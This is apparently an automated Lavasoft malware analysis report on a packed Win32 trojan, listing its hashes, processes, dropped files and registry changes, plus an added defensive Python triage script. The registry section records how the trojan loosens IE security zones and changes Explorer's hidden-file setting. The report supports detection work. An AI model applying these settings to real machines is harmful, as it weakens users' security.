Detections: HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Zusy.79781 (B) (Emsisoft), Gen:Variant.Zusy.79781 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 9f63e8b517f9578effb8adbf78bb3dce
SHA1: a60551d80de28799af96aefbc0138bf5abab21f5
SHA256: b934f1c369ae0c65a941476eb56f298ad51aec25832016914b09ddb599d4f418
SSDeep: 6144:sFG/GtASLSFJPOVmbPbn6r/Lu0gh9RGDeAMzRBMDdjg:sUG8JmKD6r/dgTUeAwRBMDdk
Size: 282112 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-01-15 11:06:55
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE:1060
WScript.exe:368
CrashHandler.exe:420
CrashHandler.exe:680
HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE:1648
bfgsetup_s1_l1.exe:1796
%original file name%.exe:1236
reg.exe:1164
reg.exe:620
reg.exe:232
reg.exe:204
reg.exe:1832
reg.exe:508
reg.exe:1352
reg.exe:1292
reg.exe:280
reg.exe:308
reg.exe:1176
reg.exe:996
reg.exe:468
reg.exe:208
reg.exe:1356
reg.exe:1496
reg.exe:964
reg.exe:904
reg.exe:968
reg.exe:2024
reg.exe:644
reg.exe:1100
reg.exe:544
reg.exe:1764
The Trojan injects its code into the following process(es):
Ptype.exe:752
Ptype.exe:1144
bfgsetup_s1_l1.exe:552
HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe:1128
File activity
The process 3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE:1060 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Ptype.exe (3312 bytes)
%Documents and Settings%\%current user%\CrashHandler.exe (81017 bytes)
The process WScript.exe:368 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application DataFilename.exe (601 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\aihgmsvmb.vbs (0 bytes)
The process CrashHandler.exe:420 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_socket.pyd (1960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\select.pyd (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcm90.dll (589 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_hashlib.pyd (2341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\Microsoft.VC90.CRT.manifest (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\unicodedata.pyd (3821 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\win32api.pyd (706 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcp90.dll (2342 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\triple.exe.manifest (731 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\python27.dll (16699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcr90.dll (4448 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_ssl.pyd (6386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\bz2.pyd (1137 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\pywintypes27.dll (1098 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\select.pyd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcr90.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcm90.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_hashlib.pyd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\Microsoft.VC90.CRT.manifest (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\msvcp90.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\win32api.pyd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_ssl.pyd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\triple.exe.manifest (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\python27.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\_socket.pyd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\bz2.pyd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\pywintypes27.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_MEI4202\unicodedata.pyd (0 bytes)
The process HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE:1648 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\UserInfo.dll (3 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe (5731 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\System.dll (9 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsn1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp (0 bytes)
The process Ptype.exe:752 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Application Data\aihgmsvmb.vbs (429 bytes)
The process Ptype.exe:1144 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~a21524.log (4 bytes)
The process bfgsetup_s1_l1.exe:1796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsxA.tmp\UserInfo.dll (3 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\clientinstaller\bfgsetup_s1_l1.exe (1120371 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxA.tmp\System.dll (9 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxA.tmp (0 bytes)
The process bfgsetup_s1_l1.exe:552 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_en.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_fr.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_es.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_sw.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_de.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_de.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_pt.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_dn.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_it.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_it.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_fr.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_pt.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_en.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_jp.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_es.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\AccessControl.dll (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_dn.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_jp.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\emaildialog_du.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_du.ini (3 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\GameManager\log\gamemanager_install_log.txt (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\uac.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxC.tmp (1178954 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\modern-header.bmp (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp\choosedialog_sw.ini (3 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsxB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscD.tmp (0 bytes)
The process %original file name%.exe:1236 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE (237 bytes)
The process HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe:1128 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\NSISdl.dll (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S1YHUDA9\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\uac.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\inetc.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IJE9GDOV\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S5KLKDKJ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\nsProcess.dll (4206 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl8.tmp (36 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe (2998318 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IRCX4XCX\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\System.dll (11 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\GameManager\log\gamestub_t_install_log.txt (37602 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bigfishgames[1].txt (318 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\throttle.txt (2 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bigfishgames[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp (0 bytes)
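The file activity above is easier to read once it is grouped by what the paths reveal: a `_MEI4202` directory filled with `python27.dll` and `*.pyd` files is the extraction directory of a PyInstaller one-file bundle (CrashHandler.exe is a packaged Python 2.7 program), `ns??.tmp\System.dll` and `UserInfo.dll` are NSIS runtime plugins being unpacked by an installer, and `aihgmsvmb.vbs` is written by Ptype.exe, run by WScript.exe and then deleted. The following Python script is an added example, not part of the Lavasoft report or its tooling. It parses a constructed subset of the lines above, in the report's own format, and tags these patterns; the regular expressions for the PyInstaller and NSIS directory names are the author's assumptions about those tools' naming conventions, not something the report states.

```python
import re
from collections import defaultdict

# Constructed sample (added here, not part of the original report): a subset of
# the file-activity lines above, copied in the report's own format so the
# parser can be exercised offline.
SAMPLE_FILE_ACTIVITY = """\
The process CrashHandler.exe:420 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\\%current user%\\Local Settings\\Temp\\_MEI4202\\python27.dll (16699 bytes)
%Documents and Settings%\\%current user%\\Local Settings\\Temp\\_MEI4202\\_ssl.pyd (6386 bytes)
%Documents and Settings%\\%current user%\\Local Settings\\Temp\\_MEI4202\\triple.exe.manifest (731 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\\%current user%\\Local Settings\\Temp\\_MEI4202\\python27.dll (0 bytes)
The process HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE:1648 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\\%current user%\\Local Settings\\Temp\\nsi2.tmp\\System.dll (9 bytes)
%Documents and Settings%\\All Users\\Application Data\\BigFishCache\\Upgrade\\stub\\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe (5731 bytes)
The process Ptype.exe:752 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\\%current user%\\Local Settings\\Application Data\\aihgmsvmb.vbs (429 bytes)
The process WScript.exe:368 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\\%current user%\\Application DataFilename.exe (601 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\\%current user%\\Local Settings\\Application Data\\aihgmsvmb.vbs (0 bytes)
"""

PROC_RE = re.compile(r"^The process (.+) makes changes in the file system\.$")
FILE_RE = re.compile(r"^(.+) \((\d+) bytes\)$")

# Path shapes that identify the packaging technology of a dropped stage
# (assumed naming conventions of PyInstaller and NSIS, not stated by the report).
PYINSTALLER_DIR = re.compile(r"\\_MEI\d+\\")                     # PyInstaller one-file extraction dir
NSIS_PLUGIN_DIR = re.compile(r"\\ns[a-z0-9]{2}\.tmp\\", re.I)    # NSIS $PLUGINSDIR (nsi2.tmp, nsxA.tmp, ...)


def parse_file_activity(text):
    """Turn the report's file-activity block into (process, action, path, size) tuples."""
    events = []
    proc = action = None
    for line in text.splitlines():
        m = PROC_RE.match(line)
        if m:
            proc, action = m.group(1), None
            continue
        if line.startswith("The Trojan creates and/or writes"):
            action = "write"
            continue
        if line.startswith("The Trojan deletes"):
            action = "delete"
            continue
        m = FILE_RE.match(line)
        if m and proc and action:
            events.append((proc, action, m.group(1), int(m.group(2))))
    return events


def triage(events):
    """Group events into the behaviours an analyst cares about."""
    findings = defaultdict(set)
    for proc, action, path, _size in events:
        low = path.lower()
        # python27.dll plus *.pyd under _MEIxxxx = a PyInstaller-bundled Python 2.7 stage
        if PYINSTALLER_DIR.search(path) and low.endswith(("python27.dll", ".pyd")):
            findings["pyinstaller_unpack"].add(proc)
        # NSIS runtime plugins (System.dll, UserInfo.dll, ...) extracted to ns??.tmp
        if NSIS_PLUGIN_DIR.search(path) and low.endswith(".dll"):
            findings["nsis_installer"].add(proc)
        # executables/scripts written outside %Temp% are candidate persistence payloads
        if action == "write" and low.endswith((".exe", ".vbs")) and "\\temp\\" not in low:
            findings["dropped_outside_temp"].add(path)
    # stage-and-wipe: a script written by one process and later deleted
    # (in the report, after WScript.exe ran it)
    written = {p for _, a, p, _ in events if a == "write" and p.lower().endswith(".vbs")}
    deleted = {p for _, a, p, _ in events if a == "delete" and p.lower().endswith(".vbs")}
    for path in written & deleted:
        findings["script_dropped_then_deleted"].add(path)
    return {k: sorted(v) for k, v in findings.items()}


if __name__ == "__main__":
    for kind, items in triage(parse_file_activity(SAMPLE_FILE_ACTIVITY)).items():
        print(kind)
        for item in items:
            print("   ", item)
```

Run against the full report rather than the sample, the same rules also flag `Ptype.exe` and `CrashHandler.exe` written directly under the user profile, and the second NSIS stage `bfgsetup_s1_l1.exe` under `BigFishCache`. The sizes in the report are useful too: the 0-byte entries in every "deletes" list are how this report format records a deletion, not a truncated file.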
Registry activity
The process 3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE:1060 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C 0B 8D 03 68 B4 5A 0A AE 26 A5 56 81 81 7A 40"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%]
"Ptype.exe" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%]
"CrashHandler.exe" = "CrashHandler"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies the IE security-zone map so that all UNC network paths are treated as belonging to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies the IE security-zone map so that all local (intranet) sites not listed in another zone are treated as belonging to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies the IE security-zone map so that all sites that bypass the proxy server are treated as belonging to the Intranet Zone:
"ProxyBypass" = "1"
The process WScript.exe:368 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D6 C0 6E 7E 02 D2 21 AC E0 D6 9B AA FB CF 56 A6"
The process CrashHandler.exe:680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 3E A5 03 6E 9C F1 6A 40 42 98 F6 6C 81 5F E6"
The process HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE:1648 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "68 87 A9 4C FA FE 23 FC 8B BE 42 FA 8B 98 B8 5D"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process Ptype.exe:752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 02 38 01 4D 04 26 FC 42 0B F9 FA 6B F3 6D 6F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"reg.exe" = "Registry Console Tool"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"wscript.exe" = "Microsoft (R) Windows Based Script Host"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies the IE security-zone map so that all sites that bypass the proxy server are treated as belonging to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies the IE security-zone map so that all local (intranet) sites not listed in another zone are treated as belonging to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies the IE security-zone map so that all UNC network paths are treated as belonging to the Intranet Zone:
"UNCAsIntranet" = "1"
The process Ptype.exe:1144 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 93 6A A4 54 01 E5 34 0B 88 7E C7 D6 AF 63 58"
The process bfgsetup_s1_l1.exe:1796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 B7 99 DE 09 47 4E 44 8E C3 B5 4C 45 06 17 06"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process bfgsetup_s1_l1.exe:552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 47 02 8C 53 40 9E BD 07 14 38 15 C0 8D 1F C6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Big Fish Games]
"Default" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process %original file name%.exe:1236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A 98 2B BC FF 43 3F 2E 76 B7 A1 AD 47 6F 25 D5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"3ZZOSOZFJDS82MK21IQNAJPKVPXSBZKZ..EXE" = "prueba1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies the IE security-zone map so that all local (intranet) sites not listed in another zone are treated as belonging to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies the IE security-zone map so that all UNC network paths are treated as belonging to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies the IE security-zone map so that all sites that bypass the proxy server are treated as belonging to the Intranet Zone:
"ProxyBypass" = "1"
The process reg.exe:1164 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC 55 2A E5 B8 82 E4 E2 DF 10 A6 29 1B 61 AF 18"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "1"
The process reg.exe:620 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 87 9B B9 04 C7 59 AE 02 09 58 B2 F1 5C 3F B6"
